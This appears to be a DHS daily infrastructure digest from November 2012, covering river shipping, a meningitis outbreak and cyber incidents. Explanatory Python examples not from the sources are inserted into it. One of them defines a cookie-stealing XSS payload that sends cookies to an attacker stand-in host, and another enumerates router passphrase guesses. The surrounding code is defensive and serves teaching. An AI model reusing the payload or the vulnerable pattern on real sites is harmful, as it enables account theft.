Monday, November 26, 2012
Daily Report
Top Stories
• A crucial 200-mile stretch of the Mississippi River may be on
the verge of shutdown to barge traffic, a move that could paralyze commerce on
a vital inland waterway and ultimately drive up consumer prices. – USA Today
6. November 23, USA Today – (National) Mississippi River commerce imperiled by low water.
A crucial 200-mile stretch of the Mississippi River may be on the verge of shutdown
to barge traffic, a move that could paralyze commerce on a vital inland waterway
and ultimately drive up consumer prices. The temporary closure of the Mississippi
River from St. Louis to Cairo, Illinois, could result from an Army Corps of Engineers
plan to reduce water flow from a reservoir into the Missouri River starting November
23, shipping companies and industry groups warned. The Corps annually decreases
water releases to ensure adequate reservoir levels and to prevent ice buildup and
flooding. In 2012, already-low river levels caused by drought could shrink to
the point that barges carrying grain, coal, and other products would not be
able to navigate the Mississippi, said a spokesperson with the Waterways
Council, which represents ports and shippers. “This is an impending economic
crisis that could delay shipment of $7 billion in commodities in December and
January,” she said. A Corps spokeswoman said water releases from the reservoir
at Gavins Point Dam on the Nebraska-South Dakota border will drop gradually
starting November 23 from 36,000 cubic feet per second to 12,000 by December
11. Due to the drought, most vessels on the Mississippi River are now limited
to a 9-foot draft, said a spokesperson with Knight Hawk Coal. “If we go to
6-foot drafts, the river is effectively closed,” he said. Source: http://www.firstcoastnews.com/news/usworld/article/283549/6/Mississippi-River-commerce-imperiled-by-low-water
• Testing by the U.S. Food and Drug Administration on steroid
medications produced by the New England Compounding Center found more
contaminants in additional drugs. – Nashville Tennessean
21. November 21, Nashville Tennessean – (National) Meningitis outbreak: FDA
finds more contaminants in NECC meds. Testing by the U.S. Food and Drug Administration
(FDA) on steroid medications produced by New England Compounding Center has
found more contaminants in additional drugs, the Nashville Tennessean reported
November 21. The FDA has updated its list of lot numbers for contaminated drugs
after finding unknown fungal growths in triamcinolone and betamethasone. It also
found three forms of bacteria in betamethasone and one form of bacteria in triamcinolone.
New England Compounding Center’s products have been linked to a national
outbreak of fungal meningitis and other infections that have sickened 490 people,
with 34 deaths. Tennessee has had the most deaths with 13 and the second-most illnesses
with 82. This is the first time that the FDA has confirmed contaminants in triamcinolone.
However, the agency previously said in an inspection report that foreign substances
were found on heating and cooling vent louvers behind a piece of equipment used
to make bulk drug suspensions of preservative-free methylprednisolone and triamcinolone.
• Nearly 50 female inmates at a York County, Pennsylvania prison
were treated for carbon monoxide poisoning. Officials said a preliminary investigation
indicated the deadly odorless and colorless gas may have come from the heating,
ventilation, and air conditioning system. – Associated Press
23. November 22, Associated Press – (Pennsylvania) 49 female inmates sickened by gas at Pa.
prison. Nearly 50 female inmates at a York County, Pennsylvania prison were
treated for carbon monoxide poisoning. A statement from York County said five inmates
remained hospitalized as of November 22. The remaining 44 were returned to the
York County Prison. The women fell ill November 21 in a prison dormitory. Officials
said a preliminary investigation indicated the deadly odorless and colorless gas
may have come from the heating, ventilation, and air conditioning system. That system
was shut down. The county’s statement said carbon monoxide levels have returned
to normal. Prisoners living in the affected unit were relocated to other areas
in the facility. Source: http://www.google.com/hostednews/ap/article/ALeqM5iWnMC3qY_jBrba0wSdXlCqqaEmbA?docId=aff8ec4e6a09455fa42c48a4806acbf3
• Internet service was restored November 21 for Charter
Communications customers after vandals cut a fiber-optic cable, crashing service
across northern California for about 18 hours. The outage affected local
Internet service providers and the City of Redding’s systems as well. – Redding
Record Searchlight See item 33 below in
the Communications Sector
Details
Banking and Finance Sector
3. November 23, Silicon Republic – (International) Fake Apple invoices in your inbox could lead
to empty bank accounts. Fake Apple invoices are appearing in inboxes that
contain a Blackhole exploit kit and a trojan that is designed to log users’
keystrokes and ultimately compromise bank accounts, Silicon Republic reported
November 23. The multi-pronged approach was discovered by a Sophos researcher
who reported it in the Naked Security blog. The online criminals who circulated
the fake invoices are using a form of social engineering in which users think they
are being billed for an expensive product they never bought; in the
researcher’s case, he received an invoice saying he had ordered and paid for
goods valued at $699. If a user clicks on any of the links contained in the
email, they are taken to a page purporting to be from the IRS that tells them their
browser is unsupported and offers a range of browser options. As the page is displayed,
the Blackhole exploit kit attempts to infect the user’s computer with the Zeus/Zbot
trojan. If the user clicks on any of the browser options, a file labeled update.exe
is downloaded. If the user opens the file, their computer is infected with the trojan,
which is designed to record keystrokes and ultimately give criminals the
information they need to access the user’s bank account online.
4. November 23, The H – (International) DDoS attackers cost PayPal 3.5 million pounds.
PayPal paid around $5.6 million to defend and arm itself against
distributed denial-of-service (DDoS) attacks, The H reported November 23. The
attacks in 2010 and 2011 were named Operation Payback by members of hacktivist
collective Anonymous. The details were revealed in a court case in the United
Kingdom where a defendant is facing charges of conspiring to impair the
operation of computers. The BBC reported the prosecution as saying that more than
one hundred workers from eBay, PayPal’s parent company, spent 3 weeks working
on DDoS-attack-related issues and that PayPal had bought software and hardware
to defend itself against further attacks. Source: http://www.h-online.com/security/news/item/DDoS-attackers-cost-PayPal-Lb3-5-million-1755947.html
Information Technology Sector
26. November 23, Krebs on Security – (International) Yahoo email-stealing exploit
fetches $700. A zero-day vulnerability in yahoo.com that lets attackers hijack Yahoo!
email accounts and redirect users to malicious Web sites offers a fascinating glimpse
into the underground market for large-scale exploits. The exploit, being sold for $700
by an Egyptian hacker on an exclusive cybercrime forum, targets a “cross-site
scripting” (XSS) weakness in yahoo.com that lets attackers steal cookies from Yahoo!
Webmail users. Such a flaw would let attackers send or read email from the victim’s
account. “I’m selling Yahoo stored xss that steal Yahoo emails cookies and works on
ALL browsers,” wrote the vendor of this exploit, using the hacker handle ‘TheHell.’
“And you don’t need to bypass IE or Chrome xss filter as it do that itself because it’s
stored xss.” Krebs On Security alerted Yahoo! to the vulnerability, and the company
says it is responding to the issue. The director of security at Yahoo! said the challenge
now is working out the exact yahoo.com URL that triggers the exploit.
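The mechanics behind item 26, as an added example that is not from the Krebs article and not Yahoo!’s code: a stored value rendered without escaping lets a planted script read document.cookie and send it off-site, and because the script comes back from the server’s own database rather than echoing the request, a browser’s reflected-XSS filter has nothing to match. The cookie name, the page layout and the payload are assumptions made for the illustration. The hardened renderer escapes the stored value, and the HttpOnly flag keeps the session cookie out of document.cookie; note that HttpOnly blunts this particular theft but does not remove the XSS, since script running in the page can still drive the mailbox through the site’s own requests.

```python
import html
from http.cookies import SimpleCookie

# Constructed payload for this example: a generic cookie-stealing script of the
# kind a stored-XSS seller would plant in a field that other users' browsers render.
# (The actual yahoo.com payload was not published.)
COOKIE_STEALER = (
    "<script>new Image().src='http://attacker.invalid/c?'"
    "+encodeURIComponent(document.cookie)</script>"
)


def render_inbox_vulnerable(subjects):
    """Vulnerable: stored, attacker-controlled subjects are pasted raw into HTML.

    The script is served from the site's own data store, so a reflected-XSS
    filter that compares request parameters with the response never fires.
    """
    rows = "".join(f"<li>{s}</li>" for s in subjects)
    return f"<ul>{rows}</ul>"


def render_inbox_hardened(subjects):
    """Hardened: every untrusted value is escaped for the HTML text context."""
    rows = "".join(f"<li>{html.escape(s, quote=True)}</li>" for s in subjects)
    return f"<ul>{rows}</ul>"


def session_cookie_header(session_id, hardened=True):
    """Build the Set-Cookie header for the webmail session.

    HttpOnly hides the cookie from document.cookie, so the payload above can no
    longer exfiltrate it. Cookie name 'Y' is illustrative only.
    """
    c = SimpleCookie()
    c["Y"] = session_id
    c["Y"]["path"] = "/"
    if hardened:
        c["Y"]["httponly"] = True
        c["Y"]["secure"] = True
    return c.output(header="Set-Cookie:")


def has_live_script(page):
    """Would an HTML parser see a <script> element in this page?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_inbox_vulnerable(["Re: lunch", COOKIE_STEALER]))
    print(render_inbox_hardened(["Re: lunch", COOKIE_STEALER]))
    print(session_cookie_header("deadbeef"))
```

The escaping has to happen at output time for the context the value lands in (text, attribute, URL, script); escaping once on input and trusting the database, which is what a stored XSS exploits, is the pattern to avoid.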
27. November 23, Softpedia – (International) Cybercriminals use fake digital certificates to
sign police trojans. Cybercriminals have begun using fake certificates to
sign ransomware so that the malware has a better chance of evading
digital signature checks. Trend Micro experts have come across a couple of
samples, identified as TROJ_RANSOM.DDR, both signed under a suspicious name and
issued by a suspicious provider. A signature from such a certificate is syntactically
valid but does not chain to a trusted root; what it defeats are tools that only test
whether a file is signed rather than by whom. One of the samples invokes the FBI to scare
users into paying a fine if they want their computers unlocked,
while the other trades on the reputation of the UK’s Police Central e-Crime
Unit. The newer variants lock up computers and threaten victims with messages
tailored to their geographic location: the language used to demand payment of the
fine is adapted, and so is the name of the law enforcement agency. Source: http://news.softpedia.com/news/Cybercriminals-Use-Fake-Digital-Certificatesto-Sign-Police-Trojans-309128.shtml
28. November 23, Softpedia – (International) Sucuri warns of fake jQuery sites distributing
malware. Cybercriminals have set up a number of fake jQuery Web sites and
are using them to distribute pieces of malware. Experts from Sucuri Malware
Labs have identified at least three such sites. The jquerys.org,
jquery-framework.com, and jqueryc.com domains are the ones in question.
According to researchers, references to jqueryc.com have been found in the
header of the index.php file of numerous sites. Users are advised to steer
clear of such sites. The legitimate jQuery sites are jquery.com and jquery.org.
Other variants, even if they look legitimate, are likely fake. Source: http://news.softpedia.com/news/Sucuri-Warns-of-Fake-jQuery-Sites-Distributing-Malware-309189.shtml
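A check a site owner could run over their own pages for item 28, as an added example that is not Sucuri’s tooling: collect every external script reference, accept only hosts under the legitimate jquery.com and jquery.org domains as jQuery project sites, flag the three domains named in the advisory, and treat any other host with “jquery” in its name as a lookalike worth investigating. The sample page is constructed for this example; cdn.jquery-libs.invalid is a made-up lookalike on the reserved .invalid TLD.

```python
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Legitimate jQuery project domains from the advisory (subdomains such as
# code.jquery.com are covered by the suffix match below).
LEGIT_JQUERY_DOMAINS = ("jquery.com", "jquery.org")
# Domains the advisory names as fake.
KNOWN_FAKE_DOMAINS = ("jquerys.org", "jquery-framework.com", "jqueryc.com")


class _ScriptSrcCollector(HTMLParser):
    """Collects the src attribute of every <script> tag in a page."""

    def __init__(self):
        super().__init__()
        self.srcs = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            for name, value in attrs:
                if name.lower() == "src" and value:
                    self.srcs.append(value.strip())


def _host_of(src):
    if src.startswith("//"):          # protocol-relative URL
        src = "https:" + src
    return (urlsplit(src).hostname or "").lower()


def _under(host, domain):
    return host == domain or host.endswith("." + domain)


def classify_script_hosts(html_text):
    """Return [(host, verdict), ...] for every externally loaded script.

    Verdicts: legit-jquery, known-fake, lookalike (contains 'jquery' but is not
    a jQuery project domain), other (any other third-party host).
    """
    collector = _ScriptSrcCollector()
    collector.feed(html_text)
    results = []
    for src in collector.srcs:
        host = _host_of(src)
        if not host:
            continue  # relative path: served by the site itself
        if any(_under(host, d) for d in LEGIT_JQUERY_DOMAINS):
            verdict = "legit-jquery"
        elif any(_under(host, d) for d in KNOWN_FAKE_DOMAINS):
            verdict = "known-fake"
        elif "jquery" in host:
            verdict = "lookalike"
        else:
            verdict = "other"
        results.append((host, verdict))
    return results


def suspicious_hosts(html_text):
    """Hosts a webmaster should investigate before trusting the page's scripts."""
    return sorted({h for h, v in classify_script_hosts(html_text)
                   if v in ("known-fake", "lookalike")})


# Constructed sample page: one real jQuery CDN include, one include from a domain
# named in the advisory, one made-up lookalike (.invalid TLD), one local script.
SAMPLE_INDEX = """<html><head>
<script src="http://code.jquery.com/jquery-1.8.3.min.js"></script>
<script src="//jqueryc.com/jquery.js"></script>
<script type="text/javascript" src="https://cdn.jquery-libs.invalid/j.js"></script>
<script src="/static/app.js"></script>
</head><body></body></html>"""

if __name__ == "__main__":
    for host, verdict in classify_script_hosts(SAMPLE_INDEX):
        print(f"{verdict:13} {host}")
```

Run it over the rendered output of the site, not just index.php, since a theme or plugin can inject the reference. The known-fake list goes stale quickly; the lookalike rule is the durable part of the check.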
29. November 23, Softpedia – (International) Cybercriminals hack DNS records of Go Daddy
sites to distribute ransomware. Cybercriminals have found a clever way to distribute
ransomware: altering the Domain Name System (DNS) records of Web
sites hosted by Go Daddy so that visitors are redirected to the attackers’ own
malicious sites. According to researchers from security firm Sophos, the crooks add
their own IP addresses to the DNS records of the affected sites. By adding several
subdomains with corresponding DNS entries that point at malicious IPs, attackers can
evade security filtering, since the rogue hostnames inherit the reputation of the
legitimate domain, and trick users into thinking that they are on a legitimate site.
In this particular case, the rogue servers to which users are redirected host an
exploit kit called Cool EK, which looks for vulnerabilities in the target system in
order to install ransomware. Experts have not been able to determine whether the
attackers are using stolen account credentials, because Go Daddy does not allow
webmasters to view their historical login activity. Source: http://news.softpedia.com/news/Cybercriminals-Hack-DNS-Records-of-Go-Daddy-Sites-to-Distribute-Ransomware-309327.shtml
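Since the registrar offers no login history, the practical detection for item 29 is to keep your own snapshot of the zone and diff it. The following is an added example, not Sophos’s or Go Daddy’s code: it parses two zone exports in the common “name ttl IN A address” form, reports new names, changed addresses and removed names, and marks anything that points outside the hosting provider’s netblock, which is the signature of this campaign. Both zone exports, the domain example-shop.com and the 203.0.113.0/24 provider range are constructed for the example.

```python
import ipaddress

# Constructed export of a site's records (what the registrar's DNS panel or a zone
# transfer would show), captured when the site was known-good.
BASELINE_ZONE = """\
example-shop.com.        3600 IN A 203.0.113.10
www.example-shop.com.    3600 IN A 203.0.113.10
mail.example-shop.com.   3600 IN A 203.0.113.25
"""

# Constructed later export: two subdomains now resolve to attacker servers, while the
# original records are untouched so the site itself still looks normal.
CURRENT_ZONE = """\
example-shop.com.        3600 IN A 203.0.113.10
www.example-shop.com.    3600 IN A 203.0.113.10
mail.example-shop.com.   3600 IN A 203.0.113.25
cdn-update.example-shop.com. 300 IN A 198.51.100.77
login2.example-shop.com.     300 IN A 198.51.100.78
"""

# Hypothetical netblock of the site's hosting provider; A records outside it deserve a look.
EXPECTED_NETS = [ipaddress.ip_network("203.0.113.0/24")]


def parse_zone(text):
    """Parse 'name ttl IN A addr' lines into {name: {addr, ...}} (A records only)."""
    records = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 5 or parts[2].upper() != "IN" or parts[3].upper() != "A":
            continue
        name = parts[0].rstrip(".").lower()
        records.setdefault(name, set()).add(parts[4])
    return records


def _outside(addr, nets):
    ip = ipaddress.ip_address(addr)
    return not any(ip in n for n in nets)


def diff_zones(baseline, current, expected_nets=EXPECTED_NETS):
    """Flag new names, changed addresses and removed names between two snapshots.

    Returns sorted (name, address, finding) tuples. A finding whose address lies
    outside the provider's netblock gets an '-outside-provider' suffix.
    """
    findings = []
    for name, addrs in current.items():
        old = baseline.get(name, set())
        for addr in sorted(addrs):
            if addr in old:
                continue
            kind = "new-subdomain" if name not in baseline else "changed-address"
            if _outside(addr, expected_nets):
                kind += "-outside-provider"
            findings.append((name, addr, kind))
    for name in baseline:
        if name not in current:
            findings.append((name, "", "record-removed"))
    return sorted(findings)


def hijack_findings(baseline_text, current_text):
    return diff_zones(parse_zone(baseline_text), parse_zone(current_text))


if __name__ == "__main__":
    for name, addr, kind in hijack_findings(BASELINE_ZONE, CURRENT_ZONE):
        print(f"{kind:32} {name} {addr}")
```

Schedule the export and diff daily and alert on any finding; a legitimate change will be one you recognise, whereas new subdomains with short TTLs pointing at unfamiliar addresses are the case the Sophos researchers describe.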
30. November 23, Softpedia – (International) ENISA releases report on the use of honeypots
to detect cyberattacks. Digital traps, or honeypots, are often used by security
researchers to detect and analyze cyber threats. However, according to the European
Network and Information Security Agency (ENISA), their use among Computer
Emergency Response Teams (CERTs) is not as widespread as it should be. In a
previous report, entitled “Proactive Detection of Network Security Incidents,” ENISA
detailed the benefits of using honeypots to detect and investigate attacks. Despite
their effectiveness, many CERTs have not deployed them. The new study therefore
evaluates 30 honeypot solutions to offer insight into which technologies
should be used. The report also looks at the critical issues organizations face
and at practical deployment strategies. In recent years, honeypots have
been used successfully on a number of occasions. These digital traps are designed
to mimic a real service, application, or system in order to lure potential
attackers. Because a honeypot offers no legitimate service, any entity that connects
to it is by definition suspicious, and its every move is closely monitored to detect
and record malicious activity. Source: http://news.softpedia.com/news/ENISA-Releases-Report-on-the-Use-of-Honeypots-to-Detect-Cyberattacks-309270.shtml
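The principle in item 30 in its smallest working form, as an added example that is not from the ENISA report or any of the honeypots it evaluates: a low-interaction trap that presents a banner, records whatever the client sends first, guesses which protocol the client was hunting for, and emits one JSON event per connection, every one of which is suspicious because nothing legitimate should ever connect. The ports, banner strings and the sample probes in the test are illustrative choices for this example.

```python
import json
import socketserver
from datetime import datetime, timezone

# Banners the trap presents so a scanner sees something worth talking to.
# Ports and version strings are illustrative choices for this example.
FAKE_BANNERS = {
    22: b"SSH-2.0-OpenSSH_5.3\r\n",
    25: b"220 mail.example.invalid ESMTP Postfix\r\n",
    2323: b"\r\nlogin: ",
}


def classify_probe(first_bytes):
    """Guess what the client thought it was talking to from its first bytes."""
    head = first_bytes[:64].decode("latin-1")
    first_word = head.split(" ", 1)[0].upper()
    if head.startswith("SSH-"):
        return "ssh"
    if first_word in ("GET", "POST", "HEAD", "OPTIONS", "CONNECT", "PUT"):
        return "http"
    if first_word in ("EHLO", "HELO"):
        return "smtp"
    if not first_bytes:
        return "connect-only"   # port scan or banner grab that sent nothing
    return "unknown"


def http_target(first_bytes):
    """Path from an HTTP request line, e.g. the /phpmyadmin/ that scanners hunt for."""
    try:
        line = first_bytes.split(b"\r\n", 1)[0].decode("latin-1")
        return line.split(" ")[1]
    except IndexError:
        return ""


def make_event(peer, port, first_bytes, ts=None):
    """Everything that touches the trap is suspicious by definition; record it all."""
    ts = ts or datetime.now(timezone.utc)
    proto = classify_probe(first_bytes)
    event = {
        "ts": ts.isoformat(),
        "src_ip": peer[0],
        "src_port": peer[1],
        "dst_port": port,
        "protocol": proto,
        "bytes": len(first_bytes),
        "sample": first_bytes[:200].decode("latin-1"),
        "severity": "suspicious",
    }
    if proto == "http":
        event["http_target"] = http_target(first_bytes)
    return event


class _TrapHandler(socketserver.BaseRequestHandler):
    def handle(self):
        port = self.server.server_address[1]
        self.request.sendall(FAKE_BANNERS.get(port, b""))
        self.request.settimeout(5)
        try:
            data = self.request.recv(4096)
        except OSError:
            data = b""
        print(json.dumps(make_event(self.client_address, port, data)))


def serve(bind=("0.0.0.0", 2323)):
    """Run one trap port; in practice run several and ship the JSON lines to a SIEM."""
    socketserver.ThreadingTCPServer.allow_reuse_address = True
    with socketserver.ThreadingTCPServer(bind, _TrapHandler) as server:
        server.serve_forever()


if __name__ == "__main__":
    serve()
```

Keep the trap on an address with no production role and never let it proxy or execute anything; the value is entirely in the log, and a low-interaction trap that does nothing else is also the one that cannot be turned against you.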
31. November 22, Softpedia – (International) Experts find way to crack default WPA2 passwords
of Belkin routers. Security researchers claim that the default WPA2 passwords
used by many Belkin routers can be easily guessed by an attacker who knows the
device’s WAN MAC address. A number of Belkin wireless routers are shipped with
a default WPA2 password to protect network connections. The apparently random
passwords are printed on a label on the bottom of the router. Although this approach
should in theory be more secure, because the password is likely stronger than what
many users would set themselves, it turns out that the passphrases are
not random at all. The researchers determined that the password is derived from the
device’s WAN MAC address, and since this information is not difficult to
obtain, an attacker within wireless range could easily join a targeted network if the
default configuration is used. The default password is made up of 8 characters,
which can be determined by replacing each hex digit of the WAN MAC address with
another value from a static substitution table. Several device models are
affected, including the Belkin N450 Model F9K1105V2 and Belkin Surf N150 Model
F7D1301v1. Source: http://news.softpedia.com/news/Experts-Find-Way-to-Crack-Default-WPA2-Passwords-of-Belkin-Routers-309081.shtml
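The shape of the weakness in item 31, as an added example that is not the researchers’ code and does not reproduce the real substitution table: a passphrase computed from a public identifier by a fixed table has no entropy beyond that identifier. The table here is invented, the choice of the last eight MAC digits is an assumption, and the attacker-side enumeration assumes (as is common on consumer routers, but stated here as an assumption rather than taken from the report) that the WAN MAC sits within a small offset of the wireless BSSID broadcast in every beacon. The MAC addresses are constructed. The contrast is a default generated per unit from a CSPRNG, which is what the label should carry.

```python
import secrets

# HYPOTHETICAL substitution table. The report only says each hex digit of the WAN MAC
# is replaced via a static table; the real table is not reproduced here, so this one
# is made up purely to show the shape of the weakness.
HYPOTHETICAL_TABLE = str.maketrans("0123456789abcdef", "944626389a1b7c0d")


def _mac_digits(mac):
    digits = mac.lower().replace(":", "").replace("-", "")
    if len(digits) != 12 or any(c not in "0123456789abcdef" for c in digits):
        raise ValueError("expected a 48-bit MAC address")
    return digits


def weak_default_passphrase(wan_mac):
    """MAC-derived default, shaped like the scheme in the report.

    Which eight of the twelve MAC digits feed the table is an assumption (the last
    eight here); either way the passphrase is a fixed function of a public value.
    """
    return _mac_digits(wan_mac)[-8:].translate(HYPOTHETICAL_TABLE)


def attacker_candidates(bssid, offsets=range(-8, 9)):
    """Attacker view (assumption: WAN MAC = BSSID plus or minus a small offset).

    A handful of offsets yields a handful of passphrase guesses, against the
    2^32 search an eight-hex-digit passphrase would otherwise require.
    """
    base = int(_mac_digits(bssid), 16)
    out = {}
    for off in offsets:
        mac = f"{(base + off) & 0xFFFFFFFFFFFF:012x}"
        out[mac] = weak_default_passphrase(mac)
    return out


def strong_default_passphrase(nbytes=8):
    """Per-unit value from a CSPRNG at the factory, unrelated to anything the
    device ever transmits. 8 bytes -> 16 hex characters."""
    return secrets.token_hex(nbytes)


if __name__ == "__main__":
    wan = "00:11:22:aa:bb:cc"                       # constructed address
    print("weak default for", wan, "=", weak_default_passphrase(wan))
    guesses = attacker_candidates("00:11:22:aa:bb:cb")   # BSSID one below the WAN MAC
    print(len(guesses), "guesses; hit:", weak_default_passphrase(wan) in guesses.values())
    print("random default:", strong_default_passphrase())
```

The fix for an affected unit is the same either way: replace the printed default with a passphrase of your own, since anything derivable from the device’s addresses is effectively public.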
32. November 21, Softpedia – (International) Exploitation of privileged access points: Common
vector for high-profile attacks. A study performed by information security firm
Cyber-Ark Labs reveals that, in most recent high-profile cyberattacks,
the common attack vector is the exploitation of privileged access points. These
privileged access points usually consist of administrative or privileged
accounts, application backdoors, and hardcoded or default passwords. In recent
months, privileged access points have been utilized in the Flame attacks, and in
the ones against companies such as Saudi Aramco and Subway. The executive vice
president Americas of Cyber-Ark Software explains that cybercriminals are well
aware of the power and wide-ranging access provided by these access points,
which is the main reason why future attacks will also target them. Source:
http://news.softpedia.com/news/Exploitation-of-Privileged-Access-Points-Common-Attack-Vector-for-High-Profile-Attacks-308594.shtml
For another story, see item 4 above in the Banking and Finance Sector
Communications Sector
33. November 21, Redding Record Searchlight – (California) Vandals cut
Charter Communications’ cable; crash Internet for 18 hours. Internet
service was restored November 21 for Charter Communications customers after
vandals cut a fiber-optic cable, crashing service across northern California
for about 18 hours. The cable was cut near Emeryville, outside Oakland. The outage
halted email service and online bill payment services for all City of Redding
departments. Charter officials said they did not know how many customers were
affected. A spokeswoman for Charter said Comcast customers and local Internet
service providers were also impacted by the disruption of service. The cable
was cut by vandals November 20, which sent workers scurrying to repair the
damage, a CenturyLink spokeswoman said November 21. Crews spliced the fiber
line to make the repairs. Work was slowed because of flooding in the area,
which sent water into the manholes where the cable was located. Source: http://www.redding.com/news/2012/nov/21/vandals-cut-chartercommunications-cable-crash/
Department of Homeland Security (DHS)
DHS Daily Open Source Infrastructure Report Contact Information
About the reports - The DHS Daily Open Source Infrastructure Report is a daily [Monday through Friday] summary of open-source published information concerning significant critical infrastructure issues. The DHS Daily Open Source Infrastructure Report is archived for ten days on the Department of Homeland Security Web site: http://www.dhs.gov/IPDailyReport
Contact Information
Content and Suggestions: Send mail to cikr.productfeedback@hq.dhs.gov or contact the DHS Daily Report Team at (703)387-2314
Subscribe to the Distribution List: Visit the DHS Daily Open Source Infrastructure Report and follow instructions to Get e-mail updates when this information changes.
Contact DHS
To report physical infrastructure incidents or to request information, please contact the National Infrastructure
To report cyber infrastructure incidents or to request information, please contact US-CERT at soc@us-cert.gov or visit their Web page at www.us-cert.gov.
Department of Homeland Security Disclaimer
The DHS Daily Open Source Infrastructure Report is a non-commercial publication intended to educate and inform personnel engaged in infrastructure protection. Further reproduction or redistribution is subject to original copyright restrictions. DHS provides no warranty of ownership of the copyright, or accuracy with respect to the original source material.